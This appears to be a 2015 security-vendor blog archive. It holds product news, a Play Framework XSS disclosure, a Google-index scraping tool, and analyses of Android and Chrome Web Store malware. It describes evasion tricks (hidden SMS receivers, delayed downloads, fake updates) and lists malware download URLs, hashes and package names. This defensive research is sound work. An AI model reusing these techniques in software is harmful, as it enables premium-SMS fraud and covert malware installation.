Faast already detects "Logjam": Imperfect Forward Secrecy

Florence Broderick    21 May, 2015
Faast teams have been working all day long to add a new plugin to our list of detected vulnerabilities. There has been found a new security problem in TLS protocol that allows to force the use of insecure 512 bits keys during Diffie-Hellman exchange. The use of such a short key, plus a bad practice in servers using over and over basically the same 512 bits primes, allows an attacker to break into most of supposed secure connections. This vulnerability, reported today, is known as Logjam and could affect 80% of TLS connections.

Detection of Logjam included in Faast knowledge base

After analyzing the vulnerability, our developer teams in Faast have added to our knowledge base a plugin to detect Logjam that, after going through QA process, has been released tonight. All our persistent pentesting clients will be getting security warnings related to this problem if it is detected in their infrastructures.

Latch, the best mobile app of 2015

Florence Broderick    13 May, 2015



We are the winners!
Latch, our mobile app to protect your online accounts and services when your are not connected, has just been recognized as the best mobile app of 2015 by receiving the first prize on the Internet Day Awards.

When we are all connected, we are vulnerable. If you not close the latch, download Latch (it’s free!) on your mobile device from your official market store. Discover the services where you can use Latch and improve the security for your digital life.

Internet Day Awards
The Internet Day Awards is one of the main events of the World Day of the Internet, and has gathered the best initiatives, people and organizations that improve user experience on the Internet and new technologies.

Thanks again to all who have trusted in the security of Latch, those of you who are part of our community, everyone online whose votes were collected and the recognition of the jury of the Awards.

ElevenPaths finds a XSS problem in Play Framework

Florence Broderick    11 May, 2015
Play Framework is defined as “The high velocity Web Framemork for Java and Scala”. We use it internally in some of our products. Ricardo Martín from our QA team has found a (could be permanent) XSS that has now been solved by the official team. This XSS could make all the platforms based on Play Framework, more prone to phishing attacks or able to steal data from users.

When Play framework had a problem with the URL parameter. When it parses the view, it translates it to an URL that will work as a GET request. If the parameter value starts with “:”, some exception is launched and fails to escape the value:

@{Controller.action(URLparameterWithInjection)}

How to get the URL parameter:

How to get the URL parameter where the XSS may be encoded

Then, URL goes through the program. Example of XSS injection encoded:

Result of the injected URL, encoded (which is Ok)

But once we “inject” the “:” character…

Result of the injected URL, not encoded (which is a problem)

There is a condition that does not allow to encode the injection. In fact, the code in Play Framework made it clear:

There is an specific condition that does not encode strings beginning with “:”

Whenever the view is interpreted, when translating to an URL that will work as a GET request, we may use it as a parameter to print it as a result.

We developed a PoC and sent it to developers. Versions 1.2.7 to 1.3.0 have been tested to be vulnerable. Just a week after making them aware of the problem, this alert has been released, that solves the problem: https://www.playframework.com/security/vulnerability/20150506-XssUrlParamerter.

New tool: Google index Retriever

Florence Broderick    24 April, 2015
Have you ever found a webpage that seems to talk exactly about what you need, but it has been removed? Yes, Google cache is the answer but… What if the cache has been removed too? What if the site is just in Google Index page? You can not get the webpage back, but you know it was there. 

Google Index Retriever will try to retrieve back the index in Google, so you can get part of the text back, and maybe that removed content you need. Google cache is not there forever. From time to time, they are just removed for good. Archive.org and its WayBackMachine does not take as many snapshots of the less popular pages… so, there are some situations where the only part of a web that is left is in the Google Index.

Google index is that little part of text in the results page that Google search engine shows when the user searches for anything. In the “index”, the searched words matching appear in bold. Google Index is the last part of a web to disappear. So there will be situations where that is the only part left. Google keeps different “indexes” from the same webpage, so, if they could be all put together, the text would be reconstructed and it would maybe come up.

But that is not the only situation where the tool may be useful. What if the index contains passwords, credit card numbers or any other sensitive information? In fact that was one of the reasons to create the tool: to demonstrate that removing the webpage and cache with offensive or sensitive content is not enough. The content may be still reachable. This is all explained in this presentation.

How does the tool work?

It is very easy. The tool is fed with a Google Search that produces an index result. It will try, brute forcing the Google Search (“stimulating it”) to retrieve as much as possible. Then, it has some different options:

Example with an evernote profile

  • One Shot button: It just searches once with the information provided. Use this to try to be the more specific you can with the search string before hitting on “start button”.
  • Start button: It starts searching in automatic mode. Result box will display the time elapsed since the search started, the word that made the information to come up, and finally the longest possible sentence if it differs from the last one, so the user may reconstruct the webpage.

The logic to try to “stimulate” the index and get back the information is:

  • First, try to stimulate the index with the words already found in the first index result “around” the main word searched, so it tries to retrieve the whole sentences again and again.
  • If there are no more results or “words around” left, the search is repeated with keywords provided by the user, like a “dictionary attack”. When this occurs, the progress bar changes its color.

Google, of course will launch a CAPTCHA from time to time because of the continuous use of their service. This is perfectly ok. Google Index Retriever will capture the CAPTCHA so it is easy to resolve and keep on going.

Google will show a CAPTCH from time to time

Spam

This tool may be used as well to check if a site has been probably compromised and injected with spam and black SEO. It is usual that attackers compromise webpages and inject spam words in them so the “steal” their pagerank.

Using the tool to find possible “hidden” Spam in a webpage

This content is not visible for visitors but only to Google robot and spider, so it is usually visible in this index. This tab works exactly the same as the other, but with another logic:

  • It directly tries to search from a different set of keywords (related to spam) in a Google index result.

So this way, it is easier to know if a webpage has been compromised and injected with SEO spam.

Other features

The program is written in Java, so it should work under any system and version, although it has been tested under Windows. The results may be exported to a html document in the local computer. Keywords and spamKeywords are completely customizable. They may be added individually or edited directly from a TXT file.

Customizable keywords

The tool is available to download here.

Vote for Latch on the Internet Day awards 2015

Florence Broderick    10 April, 2015


About Internet Day awards
Internet Day awards recognise those initiatives, persons and organizations that best use Internet and new technologies.

The entry
The main categories to Internet Day awards 2015 are: Best Web, Best Communication Campaign, Best Audiovisual Content, Best App Multidevice and Best Social Media Profile.

Latch app has been selected to participate in the Mobile App Multidevices category for the best app multidevice of year. Protected your accounts and online services. Discover the services where you can use Latch. Search for online services bearing the Latch: Protected badge and click on the logo to regain control of your digital life.

We can win with your vote.
Winners are selected from the on-line votes of Internet users together with the votes of a jury including recognised professionals from each category. Vote for Latch.

Thanks for being a part of Latch.

Fake AdBlocks in Chrome Web Store leads to… ¿adware?

Florence Broderick    7 April, 2015
No platform is free from abuse. Chrome Web Store has been abused in the past, mainly by ad injectors or general adware. In fact, Google has just removed almost 200 offensive extensions affecting 14 million users. But, what if apps and extensions are just the “way” to convince to install some other software or to visit a webpage? Apps and extensions as a spam technique? This has been happening for a while now with fake “AdBlocks” that leads to some other Russian anti-adware, using the Web Store as a spamming platform.

It is, in a way, a similar situation as when we found fake AdBlocks in Google Play and the recent use of Google Play Books as a platform for spreading adware and malware. Chrome Web Store is hosting fake AdBlocks, one of the most popular extensions for browsers. These apps (they are not extensions) are harmless “per se”, since they are just redirectors to some other website where some other programs are offered. Not specially dangerous… by now. This technique may result quite successful for attackers that want to “spam” their content, programs, adware or anything else. Does this mean Chrome Web Store is storing adware/malware directly with these fake apps or extensions? Not at all (they are hosting ad injectors but trying to remove them), but they are allowing developers to upload fake extensions that take advantage of a reputed brand (like AdBlock) to confuse users and get them to download something else. Nothing new, except maybe for the platform used.

How they work

Detected fake AdBlocks are very simple typical Chrome apps. We have found the same program with little differences under several different developer accounts. Here are some samples (not all of them appeared at the same time):

Some of the AdBlocks detected from different developers

These apps need no permissions. That is strange and “impossible” if it was a real AdBlock, since these apps should be able at least to read and modify data in the websites you are visiting. Even more, they should be real extensions, rather than apps.

No permissions needed

Internally, the only thing these apps do is this:

Fake AdBlockPlus code (in background.js file)

  • chrome.runtime.onInstalled.addListener: Means that, once the app is installed, this webpage will be opened in Chrome. 
  • chrome.app.runtime.onLaunched.addListener: Means that, when it is launched, this webpage is opened in Chrome. 

URLS to go to are being changed all the time.

Where they go to

These are the links we have seen so far:

  • hxxp://www.appforbrowsers.com/adguard.html
  • hxxp://www.surprisess.com/adguard.html
  • hxxp://www.appforchrome.com/adguard.html

And there are some others that, after going to some kind of app aggregator, redirect to the real AdBlock.

  • hxxp://prodownnet.info/adblock-super/
  • hxxp://appstoreonline.blogspot.com/search/label/adblock%20chrome
  • hxxp://appstoreonline.blogspot.com/search/label/adblock%20youtube

Most of them open websites that encourage the user to download a program called Adguard. A supposed ad-blocker for PC that has its own extensions for different browsers. Is this adware disguised as an anti-adware? Not an easy answer. Google blocks the site if visited with Chrome, at least a few days ago. It means Google (and maybe just them) think or thought some day that this URL should be in a blacklist.

Google blocking adguard installer a few days ago

We know that Adguard app was removed (maybe by Google, maybe by the owners) from Google Play last December. Moreover, some engines in VirusTotal, think that this is some kind of malware, detecting it with generic signatures (except Rising, the Chinese AV).

Some engines detecting the AdGuard installer

It could be a false positive, something not widely discovered yet, or just this kind of software that are legal and moving on this grey zone where some AV engines have to “respect” them by not detecting them… but are harmful for users once installed anyway.

The only way to know it for sure, would be a manual analysis. A quick analysis shows that the exe itself is changing very often. It is just a downloader for download.adguard.com/setup.exe which is a much more complex program and, again, detected just by one engine with generic signatures… which means nothing. Although Google and some AVs are detecting it, it is, most likely, not a dangerous program. And, probably as well, they are not the ones directly responsible for these fake AdBlocks… They may have a rewarding program for websites bringing downloads… who knows.

Conclusions

The important thing is not fake Chrome Apps pointing to some adware blocker. The conclusions could be:

  • Obvious, but any platform is susceptible of being abused and “spammed”. Chrome Web Store is being abused in an “innocent” way (aside the ad injectors) with fake apps, to induce the user to visit and download some other software. Using the same name and icon of reputed programs as a bait, is very effective for attackers… but easy to track and avoid for the store.
  • Although it seems to redirect to some software in a “spamming” campaign aimed to get more “visits” and that’s all so far… what if it redirects to some other website? Would it be as effective from the attackers’ standpoint as these ad injectors with 14 million affected users? We may see more apps like this in the future leading to real aggressive adware or malware.
  • Users have to be careful interpreting AV results, for good or bad, false positives exist… and of course false negatives do as well. But with enough ratio of both, the average user never really gets to know.
    The Chrome app launcher after installing some fake ABP
Sergio de los Santos

The month of the RAT in Google Play

Florence Broderick    30 March, 2015
A few days ago, Lukas Stefanko from ESET discovered a new remote administration system RAT for Android. Although there are some known RATs for Android, this malware had something special. It used Baidu Cloud Push notifications for sending commands to the victims. What we can confirm (not in the original blog entry), is that this RAT has been available not only in “alternative markets”, but in Google Play, undetected for more than a month.

Several kind of RATs for Android exist. There are two basic conditions that defines an RAT:

  • What and how it is able to control the infected device.
  • How the victim receives the commands.

How the victim receives the commands opens a handful of possibilities: HTTP, SMS, jabber protocol, GCM (Google Cloud Messaging)… and now Baidu Cloud Push notifications. Cloud Push is a system where developers can register users. Registered users will receive push notifications in their devices (an special notification in the task bar). This is used in millions of legitimate apps, and Google allows the use of its GCM for free. This system has been abused to push ads in the past. Any developer may create his own CGM, and Baidu has a popular one in China. This time it has been abused to push commands to this botnet. This technique is quite new. So new, the malware has not been detected by antiviruses for months.

What does the RAT do?

It infects the system so is waiting for commands from the Command and Control server, which is a specially crafted Baidu Cloud Push instance. Basically, this picture below summarizes it all.

Commands that the attacker may send to the device

It shows the commands the device may get from Baidu. The app counts with every necessary permission to perform the tasks, so the infected user is completely at the attackers disposition.

All the information goes through “/mnt/sdcard/DCIM/Camera/%file_name%” before being uploaded to the Baidu cloud storage (BCS) and removed from the device.

But… this has not only been in alternative markets

Stefanko found the samples in alternative markets, which is, in a way, “expected”. But some of these samples were indeed in Google Play… for more than a month. With more than 50.000 downloads, the victims may still be under the control of the attacker.

One of the RATs, available in Google Play

Thanks to Tacyt (although we did not found these samples on time…) we now know that some different samples with the same behavior were available in Google Play from, at least, November 2014. Some samples, under a certain developer, were signed during November 2014, and were available in Google Play since December. The apps were available in the main market until late January, when Google removed them. It seems that some others were available from September until late January as well, under some other fake account. These apps are still in lots of other markets.The developer seems to be from South Korea.

He has been using different names and emails: “zhengcaiai”, “devzhemin520”, “su weiyu”… This domain belongs to the attacker as well: http://devzhemin.dothome.co.kr.

What about antiviruses?

The samples were not detected about five months ago, when it all started.

One of the RATs not being detected

Until March 17th approximately, it was fully undetected. ESET and Avira have been the first ones detecting them.

Some of the first engines detecting the samples

A few days later, some others have created a signature, but still not all the big players.

Some more engines detect the samples

They have named it “cajino” RAT because of the packageName that Stefanko found. They all started with ca.ji.no.method[*] and a number. But the attacker has also used han[*].play.app structure for naming the apps in Google Play.

Newer versions are less detected

For newer versions, the only ones catching them are Avast, DrWeb and ESET, the ones that created the original signatures. This perfectly shows the notion of “quality signatures” that protects the user from future versions as much as possible.

Conclusions

RATs are not “rare” in Android world, but they are not usual, either. Aside from the conclusions of the ESET researcher, the important issues to point out here are:

  • New methods to communicate have been used.
  • Apps have been undetected for researches/antiviruses for almost six months.
  • The attacker has been in Google Play (best place ever for attackers) for more than a month.
  • And it will still get more victims, because the app is still in a lot of different markets.

Is not usual to have “RATs” in Google Play. One of the last news were the detection  of Dendroid, a RAT system designed to evade Google Play filters, a year ago.

Some different hashes (aside from the ones ESET found) are:

  • 7a131e44d731995e51b7e439082273abbbf02602
  • 48412835d0855c565f213242b0db7a26480fcc2e
  • 4c9e505f1132528c68091fa32bb1844d7cbd2687
  • 31a645973554b7c83cc0bd6fb7709ec12937c962

The attacker is distributing (aside from other markets) the apk from here: hxxp://guangzhouhan1.dothome.co.kr/music.apk, so it may change in any minute.

Sergio de los Santos

More apps in Google Play subscribing to SMS premium numbers: JSSMSers

Florence Broderick    23 March, 2015
After finding the JSDialers, we should have figured it out. The attackers are using the exact same technique as in JSDialers to spread apps that subscribe the victims to SMS premium numbers. This way they have avoided Google Play protection systems and used new techniques based on JavaScript, more dynamic and smart. They are not statically detected by antivurs engines yet. Let’s see how they work.

We have found 14 apps with the same behavior in Google Play that, with different pretexts (from jokes to recipes) subscribe the user to premium SMS numbers. Although the apps show a message about the subscription, they send an SMS by themselves confirming the subscription in a transparent way, so the user does not notice anything. The attacker got more than 100.000 downloads. Not all downloads translate into direct subscriptions because the attackers only allow important carriers from Spain, and if the device does not match with these conditions, the app will act normally.

What the user perceives

When the user downloads and installs any of these apps, something like this will be shown.

This is what the users sees if it belongs to the right carrier and country

It is true the attacker is really advising the user: you are going to be subscribed, but it automatically will send the SMS leaving no trace on the phone. In previous apps like this, the button used to be less explicit (maybe “Accept” or asking for your age) but at this point, the attackers used “Subscribe” which should make the users more aware about the problem.

The app will check if the device belongs to the right carrier and comes from Spain. By now, two different SMS have been sent, one to start the subscription and another to confirm it, but the user will notice nothing.

JavaScript code to check for carrier and country

What happens and how it works?

The whole program is launched under a WebView, and calls an index file that comes with the apk itself. When the two SMSs are sent, the apps use and interesting trick. They dynamically load the receiver to intercept the incoming messages. Usually, these receivers are declared in AndroidManifest.xml. Why dynamically? Possibly to avoid static analysis. Although the app has the permission of intercepting SMSs, a sandbox or analyst will think the developer does not really use it, because it lacks any routine to manage them. But the real thing is that it loads it only if and when necessary. The receiver works when the device receives a message, and makes the app mark it as “already read” so the user does not notice any welcome message to the subscription service.

Dynamic receiver to handle incoming SMSs

So, what is new?

There are several interesting parts on these apps.

  • First, the use of JavaScript and Cordova (the bridge between JavaScript and the apk) to send messages and avoid introducing code in the app itself. This takes the whole logic to the server, what makes it more powerful, dynamic and undetected.
  • Loading the receiver dynamically, may confuse a static analysis. The receiver is only declared under the right circumstances (right carrier and country) so it makes it stealthier. Aside, the receiver is loaded (and it may be unloaded too) via the JavaScript code, so it will only be listed if all conditions are satisfied in a dynamic analysis.
  • It does not use the usual system to send messages, but gives them directly to SMSProvider. This avoids the sent messages to be kept in “sent” or “outbound” folder. It provides the SMS text directly to the operative system provider.

Marking the incoming SMS as already read

Other apps like these

Who is behind these apps? Obviously they are related to the JSDialers we talked about a few weeks ago. The subscription company and domains just give us the right answers.

Screenshots of some of the apps we have found thanks to Tacyt, are these:

Some of the apps with this behevior

This is the title, packagename, and hash of the applications found.

  • Frases celebres bonitas cortas,com.thinkking,1e8568ccc54be7a73934965e97ff7e3fd9e4fec3
  • Imagenes amor fotos frases,com.romaticpost,2d26c676bcb5a5f8599f49a5b90599b7ff93dc11
  • Phrrasesfee,com.prasesfee,ca6ac2e1bf46087455fda358870070ec269faae6
  • Statetss,com.statetss,da045796efc737d42b9e86876ec5b854289212bc
  • New mensajes navidad y frases,com.navidad.extra,18db1cfb7e7340a5476a5c6e17f1f9d596045095
  • Postales perritos fondos,com.imagepets,bbc6e386281f2b1931ff2be7812bf4de4530d3fe
  • Funnyys,com.funnyys,9fc9e237903b02a2a47701139200c9177eec16a5
  • Fotos frases amor postales,com.prasesamor,65ce3043fc249cb906b4e50a23d581d5c70819fa
  • Gatitos tiernos fondos postal,com.cattss,f68ef39f5183da0745614c68a7ae135085298b54
  • Recetas de cocina dietas Salud,com.kitchenn,7fa17bed794a59dd3d914d05535fe25a357ab1cd
  • Chistes cortos buenos,com.chistescortos,daac73a325485f882b1dcda9758b16bb5f407770
  • Chistes Picantes buenos cortos,com.chistespicanticos,dc799bcc3f1f623e211e50fbb6ececb2e64753a6
  • Laughtter,com.laughtter,f569baf1c0f12c137a09e084c879979bbcfd11e1
  • Healthyy,com.recipesmart,0dd97d056fa7559a2cdb35d45850cefd400f4d6f
Sergio de los Santos
Juan Manuel Tirado

The impacts and benefits of telemetry in Industrial m2m processes

Beatriz Sanz Baños    12 March, 2015

Industrial m2m solutions apply to different fields of industrial processes and can be used in different ways instead of having clear use cases like other more traditional m2m solutions.

The timeframe for these solutions is also very different. Whereas Fleet Management or Utilities are mature markets, some Industrial uses are barely starting to surface at the moment.

What is crippling growth in Industrial m2m solutions?

Technology is the main improvement area for Industrial m2m solutions to fulfil their full potential. As the big players embrace technologies that enable the connection of industrial equipment this also has an impact on dropping the cost of communication technologies driving the general growth in this market.

One of the main differences between Industrial m2m solutions and others is the heterogeneity. Industrial m2m applies to diverse use cases and the targets are usually market niches. This vertical business usually offers enabled platforms that centrally control m2m devices. This platform aggregates data and displays it centralised in a single dashboard freeing users from expensive proprietary solutions. m2m is therefore a facilitator for many businesses to take control of their industrial processes gaining access to their data in a simple and aggregated way.

Tank Telemetry (fuel, agri-food or chemical tanks, to name a few), retail/industrial refrigerators (like those in breweries), asset management and vending (for both telemetry and e-payment) are the most demanded uses for Industrial m2m solutions.

Refrigerators are the perfect example of telemetry in Industrial m2m processes. They can be part of the cold chainmanagement. Having a managed cold spot allows for several uses cases: we can control that delivery processes are being carried out timely and correctly, or prevent theft through location of these very expensive assets.

The state of affairs in Telemetry

As prices of components plunge, the market is starting to provide solutions that connect through either improved LPWA, or LBE networks, or traditional connection networks allowing more efficient uses. 

The core importance of technological breakthroughs like LPWA accelerate the development and adoption rate of industrial m2m solutions that rely on these technologies to deliver new, or improved services.

Telefónica envisions the importance of industrial solutions with a long tail approach. Industrial m2m Solutions (tank telemetry, connected vending, etc.) may not individually have the same volume or turnover that the major (traditional) m2m vertical businesses do but the long tail composed of all the Industrial m2m solutions is globally comparable to the relevance of traditional m2m vertical businesses and are therefore a very relevant percentage of the business volume.

The future of telemetry

There is an ongoing strategy shift among the industrial big players (that do not have a solid foothold in the m2m business) and they are all coming to terms with the fact that they cannot remain out of the m2m businesses. Their manufacturing processes are being modified to produce m2m-ready equipment. Big industrial players such as Siemens, General Electrics or others that do not have a strong position in the m2m market are taking the necessary steps that will enable them to play a leading and role in the market.

The future of tracking

A typical use case that defines how industrial m2m solutions can transform the market are delivery tracking sensors. Previously only available for high value goods or for the cold chain, it is now slowly extending to traditional courier delivery services. Expendable, low cost tracking elements inside packaging will allow courier service companies to offer an end to end tracking of deliveries. These new services can be monetized and blow fresh air into revived businesses like postal services that were facing a collapse in their business model. Thanks to industrial m2m solutions businesses can offer a new improved service and compete by adding value instead of only relying on reducing operational costs.

"Not today downloaders": New downloaders techniques in Google Play

Florence Broderick    27 February, 2015
Downloaders are not new in Android, but lately, they are getting more and more important for attackers as a method to avoid Google Play barriers and malware detection. In Eleven Paths we have detected downloaders that, under the appearance of innocent apps, are able to download a much more dangerous apk (literally, anything). It needs user interaction and the “install from unknown sources” checked, but the trick it uses to fool the victim is quite ingenious, and allows a second app to run without the user associating the future problems to the first one installed. Let’s see how.

Downloaders are an old trick in PC and relatively not new in Android. These apps try to “find their way” to the victim, using less permissions, or even giving whatever feature they promise. This is how they get to Google Play. Then, in some future version, once they are consolidated in the market, they mutate. They become downloaders of some other much more complex adware or malware. Attackers are much more successful with these techniques. There are lots of techniques. Let’s see a new one.

How it works

The apps we have found are not very detected by antivirus yet and, if they are, is mostly because of the aggressive ad techniques it uses, not for the download technique itself. Even a lot of them are still in Google Play. We are analyzing this one, which is still online.

One of the downloaders in Google Play

It is supposed to be a voice changer, and it indeed is, just saving a .wav file and modifying the frequency of reproduction. The app itself has three different SDKs from three different ad providers. This means the downloader itself floods the device with aggressive ads. But that is not enough… The app declares a receiver called “USER_PRESENT”.

USER_PRESENT receiver, to activate when the user unlocks the device

This an official event that is launched every time the device “wakes up” by an user, in other words, basically when it is unlocked. This is the code when the event is received:

Code activated when the telephone is unlocked

Basically, what the app is doing is assuring that it has connectivity. Then it checks that is only launched once a day. This happens even when we are “out of the app”. The app counts the times (with “k” variable) it has been executed and stores it in its preferences.

Downloading… but not today

The app does not download anything the same day the downloader has been installed. So it will avoid any “dynamic analysis”. The user will install this voice changer, but will not notice anything strange until, at least, the next day. And then, the next day, another check is done. Every 2 out of 3 times it will visit the URL shown in the image. There, a txt file is pointing to some other app in Google Play, so the developer floods with “ads” the screen.

But the interesting part occurs when the app does not enter in this “if” clause and goes down the code. This method Gfveaqwfea checks for the existence of com.facebook app. It is not the official Facebook app (it is com.facebook.katana), but the adware that will be installed.

Checking if com.facebook exists, and if not, downloading the new app

The app checks if the device is ready to install apps from outside Google Play. This is very common in certain countries where the use of Google Play is limited. It is a common configuration as well as in the user’s devices that like to install “unofficial” apps, so it will be very successful in these scenarios. If so, a.apk is downloaded from the URL and saved as xxx.apk.

Checks for “install from outside Google Play” permission. If available, it tries to download the new apk
The new apk in the “Download” folder

The user will see nothing and no question will be made. Then it is launched. Depending on the configuration of the device, if the user has associated automatically the execution to Verify Apps or Install Directly, an app selector will be shown or not. When this second app is being installed, this is what the user will see:

Looks like a legitimate Facebook update

It is important to remember that this image will appear when the user unlocks the telephone, the day after the original app was installed, and only 1 out of 3 times until it is installed... so it is very unlikely that the user associates the first installation of the “voice changer” for example, with this “update” that seems like a legitimate installation/update of Facebook. The icon is quite similar and the name makes it even more messy.

Downloader general scheme

This new downloaded app may be literally anything. In this case is impersonating Facebook and the icon disappears just a second after being installed. If the user has the real Facebook, he or she will think Facebook is just updating itself, and probably will forget about it. But the real thing is that a very aggressive adware has been installed by the user with this “social engineering” trick.

The icon of the fake Facebook will disappear

Conclusions

Attackers are getting more and more specialized right now in getting an app reaching to Google Play, and transforming it into adware/malware in the long term. This long term operation will give them more victims and we are detecting this pattern more and more in malicious apps. The trick about executing the app only when the telephone is unlocked, gives it an extra of “credibility” to the victim.

With Path5, we have found the person behind these apps (a Polish programmer). He has been operating since late 2014. There are right now about 20 apps like this still up in Google Play, from more than 100 from this same developer that have been in Google Play lately. The app we have just analyzed here is us.free.voice.changer.funny.voices.lolapps, with SHA1: c0eb7cde5a1b3818a1d7af2f580f8ea3fa1e8d61

The ones that seems to be from the same person, using the same techinque, and still online, are these:

  • TV remote controller, us.tv.remote.pilot.television.free.tool2, 88287f102bbd9cf3a3e5e7601b5bc8ee760d4525
  • Faster Wifi PRANK, us.phonehelper.wifi.booster.free, 74b2cc8d95c001832a4d4fb11ea3cb9638daf5e8
  • Visión nocturna gratis, us.night.vision.nightvision.free.useit, 1606ce1f616e3ba29ac021e4ce1ac1cb5e84b7a4
  • Funny voice changer, us.free.voice.changer.funny.voices.lolapps,c0eb7cde5a1b3818a1d7af2f580f8ea3fa1e8d61
  • Fake phone call, us.free.fake.call.caller.lolapps, 3b0a2b88effd264235e75984cea3bc77a6304e8b
  • Fake connection, us.fake.call.caller.free.usapps, 2f3c8a8cd1e5ecdad0e348484c72f25aff45d755
  • Faster internet PRANK, us.phonehelper.internet.booster.free, c2b083d0ce9d13e8df2f680f2901cd54778d385e
  • Increase battery life PRANK, us.phonehelper.battery.booster.free, 4890c7437268b65ef376515047c13e0eecffdd9a
  • Funny voice changer, us.free.voice.changer.funny.voices.lolapps, a97c7f6669c41ead0ba54928ebe2cad5ba706bc5
  • Transparent phone HD, us.transparent.screen.diaphanous.phone.lolapps, 64e44c0d234f96eff5f0e44305d25b35242b0e51
  • Flash-Player installation, us.flashapps.free.flashplayer, 9f0c9145f2a265d476b936830fa9dde3d024eab6
  • Diáfano teléfono (gratis),us.transparent.screen.diaphanous.phone.free.smartools,c6c2617f7cf512669f553876939e5ca367c9e746
  • Increase volume sound PRANK, us.phonehelper.sound.booster.free, 3e360ee39146cbd834280c18d656e3e9f6d0df2f
  • Termómetro electrónico gratis, us.digital.electronic.thermometer.free.measure.temperature.temp, 722f7f2c10c4b656ded858cf9f91a8c55ea226b6
  • Ski jumping 2015, us.ski.jumping.free.game.full.sportgames, 638a1c331e76bec73b1a46a451e4d1de6cd20879
  • FlashPlayer, us.flashapps.free.flashplayer2, 9f7aa1bc90770748681b08e3ee63dcb974195f7a
  • Falsa llamada entrante, us.free.fake.call.caller.smartools, fb9c05094eb1fdcfa8aec07eeff1e95ee7814e76
  • Increase network signal PRANK,us.phonehelper.signal.booster.free,495b151c5e709bfa50c671c8fb93cbeaee29e025
  • Control remoto para la TV, us.tv.remote.pilot.television.free.tool, dbfd108973388d6c1a506ac68b79463df8271f5c
  • Fake phone call, us.free.fake.call.caller.lolapps, e96d2ab7d8d0c7990be07bd42b9e9bc079e70f3a
  • Tonos para Navidad, us.christmas.ringtones.free.carols.mp3.ringtonedownloader, fa57543faf60073f56041caee0f1524cfc9f77dd


Sergio de los Santos
Juan Manuel Tirado